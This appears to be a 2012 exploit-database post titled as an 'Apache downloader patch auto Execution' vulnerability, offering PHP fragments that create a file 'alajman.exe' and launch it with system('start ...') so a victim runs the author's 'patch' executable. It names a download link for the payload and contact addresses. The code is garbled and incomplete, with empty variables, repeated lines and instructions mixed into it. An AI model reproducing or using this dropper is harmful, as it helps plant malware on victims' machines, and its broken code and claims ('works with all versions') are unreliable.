# Exploit Title: Apache downloader patch auto Execution Vulnerability
# Date: [12-11-2012]
# Author: Hacker Alajman
# Tested on: [Windows 7 ]
# 1337day Exploits DataBase 1337day.com
# Version: Work the code with all Version
1337DaY Exploits DataBase 1337day.com
_____ _ _ ____ _ _
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\_____|\___/ \__,_|\___|\__,_| |____/ \__, | |_| |_|\__,_|\___|_|\_\___|_|
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P2@hotmail.com Ar9@hotmail.com http://mohancheema.net/alajman.zip |___/
_ _
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/_/ \_\_|\__,_| |_| |_| |_|\__,_|_| |_|
_/ |
Hello Dears
the Vulnerability Start your patch
But Must The victim start the php code on Apache Localhost i will show how the code its working
first $alajman = '';
change the link for your Patch
$fp = fopen('alajman.exe','w');
for name Your Patch
system('start name Your alajman.exe');
name your patch again
and you can test for
for this
system('start name Your alajman.exe');
$alajman = '';
$fp = fopen('alajman.exe','w');
system('start name Your alajman.exe');
#########Greetz: Hacker alajman / AnGer Hacker /#########